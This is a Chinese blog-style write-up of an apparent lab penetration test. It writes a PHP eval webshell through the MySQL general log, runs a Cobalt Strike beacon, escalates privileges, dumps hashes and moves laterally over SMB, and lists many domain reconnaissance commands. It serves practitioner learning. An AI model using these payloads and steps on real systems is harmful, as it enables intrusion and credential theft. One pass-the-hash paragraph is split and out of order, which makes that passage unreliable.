前期交互:略
信息收集
(我最喜欢的环节,只要工具多就可以摆烂,但又没人能说我在摆烂!):
IP地址收集netdiscover -i eth1 -r 192.168.218.0/24
(最正规的应该截完全图,但我这里不好看,就算了,同时真实环境应该加-p安静模式,以保证防止被发现大规模扫描被封掉,为了简约,简单的命令下文也不解释了)
Nmap端口扫描nmap -sV --script=vuln 192.168.218.191
扫到sql注入
扫到xss漏洞
扫到80端口和3306端口,同时nmap发现针对80端口有很多漏洞可以使用(这暂且按下)
目录扫描dirsearch -u 192.168.218.191
扫到登录界面(为什么有两个也不解释了)
指纹识别 whatweb -v 192.168.218.191
(不管有没有用,只要是黑盒,这四步信息收集我是必做的)
查看扫到的80端口,根据nmap提供的信息,这里可能存在sql注入,
我怀疑是下面的函数检测存在sql注入,
而上面的数据库连接检测,我怀疑存在暴力破解,测试之后没有限制(冻结等),完美的爆破环境,可以进行爆破,抓包爆破出为root,root (威胁建模与漏洞分析:有点串味了)
同时根据目录扫描提供的信息http://192.168.218.191/phpmyadmin/
发现后台管理,用root/root登录
后台发现admin账号,但是密码被加密了
到此,信息收集阶段暂时完成
威胁建模
目标:获得192.168.218.191主机的webshell
战术:mysql日志写入木马
方法:更改mysql日志文件路径,传入恶意木马,进行getshell
需要:mysql开启日志服务,当前’root’有权限更改路径,需要知道mysql日志文件路径
工具:中国蚁剑,火狐浏览器
漏洞分析:
检查是否有开启日志文件记录SHOW GLOBAL VARIABLES LIKE '%general%'
发现没有,尝试当前’root’账号有没有开启日志记录权限
执行开启日志服务功能命令,再次查询
成功修改,并且也知道日志文件路径,可以进行mysql日志提权
渗透测试:
根据信息收集,当前为php搭建的网页,所以木马采用php编写
先进行修改mysql日志文件路径,改成读取php文件(为什么是www?,因为这是phpstudy默认的路径,在登录后台就已经得知了是phpadmin,这也是phpstudy默认的后台界面)
SET GLOBAL general_log_file = 'C:/phpstudy/www/shell.php'
然后插入木马进入日志文件
select '<?php eval ($_POST[shinyorb]);?>'
然后查看191.168.218.191/shell.php
看到成功写入
蚁剑连接成功getshell
这次我用的是cs制作木马进行内网渗透,可以看到上面多了一个红色的可执行文件,那就是我传上去的木马,接下来我会介绍下木马制作
首先进行信息收集,现在暂时先用蚁剑的shell环境
ipconfig
可以看到有内网IP,可以进行更深一步的内网渗透
systeminfo
知道版本为win7的64位,进入cs4.7
选择payload针对windows的,勾上64位
(已经连上了,是因为我现在是复盘,正常操作现在还在制作木马)
cs会自动写exe文件,用蚁剑的上传,传入靶机
windows用dir查看当前目录,发现就在木马文件路径,直接运行
cs上显示靶机信息,成功,接下来可以用各种cs插件进行内网渗透了
第二种方法:
进入蚁剑后,看到有yxcms
尝试访问
发现信息泄漏,尝试登录后台
在留言板存在xss漏洞,
在网站模板存在命令执行漏洞,可以直接上传php代码,路径也显示在url...
后渗透测试:
信息收集贯穿整个PTES流程
发现当前是admin用户权限,还发现是域用户
执行shell systeminfo
看到没有修复永恒之蓝(暂且按下)
尝试使用cs插件提权
发现成功提权,cs多了个system权限
转换到这个system权限,继续用插件进行信息收集
发现域环境与域管理员
有域环境的话,可以尝试打域管,
执行命令shell wmic useraccount get /all //查看当前域环境内所有用户,当然也可以用插件
net view
发现还有两个内网IP,发现域控OWA
尝试抓取明文密码,用插件
(还是)
也可以用hashdump,这是cs自带的
新建一个SMB监听(这是因为发现有445端口开放)
进行横向穿透
横向穿透SMB的使用
因为已知admin用户账号,那肯定选择最高权限的用户,session则是与受害机建立连接的内网攻击机
,建立监听连接用的是SMB,我这里设置name为blue的就是SMB
到此,内网渗透结束,三台主机shell已经被拿下
内网getshell就在一瞬间,在明确了445端口开放后,同时没有打补丁,直接用工具使用SMB建立连接就getshell了,信息收集是很关键的,只有信息收集好了,才能准确又快速的完成渗透测试
渗透总结:
利用SMB Beacon的说明:
介绍:SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的,其他端口可能会弹窗提醒,会导致远程命令行反弹shell失败)。SMB Beacon监听器对“提升权限”和“横向渗透”中很有用。
简而言之:外网中的A主机与B主机相通且已控制B,B主机可以与内网中的C主机(无法连接公网)相通,但是A主机与C主机不相通,此时就需要在B主机上利用SMB beacon使A和C相通,进而使A主机控制C主机。
使用前提:B能访问到C的SMB端口,拥有SMB的管理员账号密码(一般在B上抓密码去碰撞)
1.具有SMB Beacon的主机必须接受端口445上的连接。
2.只能链接由同一Cobalt Strike实例管理的Beacon。
具体步骤:
1、获取C的管理员账号密码
2、创建SMB Listener
3、使用net use进行利用、验证及创建SMB Beacon
Hash传递攻击介绍:
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安
Hash传递攻击详解:
哈希传递(Pass The Hash)攻击简称 PTH,该方法通过找到与账户相关的密码散列值(NTLM Hash)来进行攻击。由于在 Windows 系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候,客户端是使用用户的 NTLM Hash 进行计算的,而不是用户密码进行计算的。因此在模拟用户登录或对访问资源的用户进行身份认证的时候,是不需要用户明文密码的,只需要用户 Hash。攻击者可以利用 NTLM HASH 直接远程登录目标主机或反弹 Shell。
在域环境中,用户登录计算机时一般使用域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也相同,攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。使用该方法,攻击者不需要花费时间来对Hash进行爆破,在内网渗透里非常经典。常常适用于域环境或工作组环境。
常用内网信息收集命令:(在用cs时,一般要在前面加上shell)
ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
whoami
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
net group "doamin controllers" /domain 查看域控制器(可能有多台)
装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。
后面写的有点乱,emm以后有空改吧,链接不变,等我之后传上去,东西很大,百度云传的很慢
链接:https://pan.baidu.你com/s/170P8wG_ZuaOC好Ale4FZN3BQ?pwd=zlmn
提取码:zlmn